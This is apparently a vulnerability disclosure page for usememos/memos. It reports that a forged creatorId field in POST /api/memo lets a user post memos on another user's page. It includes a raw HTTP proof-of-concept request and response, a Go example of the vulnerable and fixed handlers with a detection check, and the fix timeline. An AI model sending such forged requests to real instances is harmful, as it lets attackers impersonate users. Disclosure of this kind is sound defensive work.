An attacker can post a message on another user's memos page in usememos/memos

Valid

Reported on Dec 26th 2022


Description

An attacker can post malicious content to another user's memos page via a POST request: the attacker simply adds a creatorId field to the request body and sends it (for example with Burp Suite).

Here is a video PoC: https://drive.google.com/file/d/1dNKo-ybfguam4YdvmluYujN2nkTG5D9G/view?usp=share_link

Proof of Concept

POST /api/memo HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjA0OTc2MnxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfLUE9fO9PeYJaiVNyk3XeLr92UBxuKGY5S-4YXFqSUSCvaAvB
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 116
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{
"creatorId":104,
"content":"post this message in demouser wall ","visibility":"PRIVATE",
"resourceIdList":[]
}

Server Response:

HTTP/2 200 OK
Date: Mon, 26 Dec 2022 10:29:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 423
Cf-Ray: 77f9233de8d5231a-HKG
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":1054,"rowStatus":"NORMAL","creatorId":104,"createdTs":1672050590,"updatedTs":1672050590,"content":"post this message in demouser wall ","visibility":"PRIVATE","pinned":false,"displayTs":1672050590,"creator":{"id":104,"rowStatus":"NORMAL","createdTs":1672035458,"updatedTs":1672035527,"username":"demouser","role":"USER","email":"","nickname":"demouser","openId":"","userSettingList":null},"resourceList":[]}}
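The handler pattern behind this report, as an added illustrative example in Go (not memos's own code): the vulnerable version keeps the creatorId from the request body, while the fixed version overwrites it with the authenticated session user. The struct, the attacker's session user ID 7 and the isSpoofed check are assumptions; the request body is constructed from the PoC above.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// memoCreate mirrors the JSON body of POST /api/memo; creatorId is the
// field the PoC above controls (assumed struct, not memos's own).
type memoCreate struct {
	CreatorID  int    `json:"creatorId"`
	Content    string `json:"content"`
	Visibility string `json:"visibility"`
}

// createMemoVulnerable trusts creatorId from the body and only falls back to
// the session user when it is absent, so a memo can be planted on any user.
func createMemoVulnerable(sessionUserID int, body []byte) (memoCreate, error) {
	var m memoCreate
	if err := json.Unmarshal(body, &m); err != nil {
		return memoCreate{}, err
	}
	if m.CreatorID == 0 {
		m.CreatorID = sessionUserID
	}
	return m, nil
}

// createMemoFixed ignores the client-supplied creatorId entirely and binds
// the memo to the authenticated session user, the server-side authority.
func createMemoFixed(sessionUserID int, body []byte) (memoCreate, error) {
	var m memoCreate
	if err := json.Unmarshal(body, &m); err != nil {
		return memoCreate{}, err
	}
	m.CreatorID = sessionUserID
	return m, nil
}

// isSpoofed flags a memo whose creator differs from the session that sent it.
func isSpoofed(sessionUserID int, m memoCreate) bool { return m.CreatorID != sessionUserID }

func main() {
	// Constructed from the PoC: attacker session is user 7 (assumed), body claims 104.
	body := []byte(`{"creatorId":104,"content":"post this message in demouser wall ","visibility":"PRIVATE","resourceIdList":[]}`)
	v, _ := createMemoVulnerable(7, body)
	f, _ := createMemoFixed(7, body)
	fmt.Println("vulnerable:", v.CreatorID, isSpoofed(7, v), "fixed:", f.CreatorID, isSpoofed(7, f))
}
```

The same check as isSpoofed, run over request logs that record both the session user and the stored creatorId, surfaces attempts to exploit this on an unpatched instance.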

Impact

This vulnerability affects all users in memos.

We are processing your report and will contact the usememos/memos team within 24 hours. (14 days ago)
Nguyen Minh Quang modified the report (14 days ago)
We have contacted a member of the usememos/memos team and are waiting to hear back (13 days ago)
STEVEN validated this vulnerability (12 days ago)
Nguyen Minh Quang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7

Nguyen (Researcher), 12 days ago:

Can you assign this as a CVE?

STEVEN marked this as fixed in 0.9.1 with commit 3556ae (11 days ago)
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability (11 days ago)
resource.go#L23 has been validated